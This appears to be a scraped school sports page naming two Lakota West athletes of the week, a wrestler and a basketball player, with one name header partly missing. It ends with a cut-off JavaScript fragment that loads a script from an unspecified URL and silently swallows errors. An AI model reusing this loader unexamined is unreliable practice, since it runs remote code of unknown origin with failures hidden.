Athletes of the Week
Kemba Credit Union Athletes of the Week 12/31/2018-12/6/2019
Junior, Wrestling
John was the only Firebird double winner at Saturday’s Vandalia-Butler, Harrison Tri-Match. Doyle, competing at 113 pounds, won both of his matches by pin.
Bryanna Henderson
Senior, Girls Basketball
Bryanna filled all the columns on her stat line while leading Lakota West to a decisive road win at Hamilton. Henderson tallied 10 points, 3 assists, 2 shot blocks, 1 steal, and 1 rebound. She accomplished this while playing only half the game.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();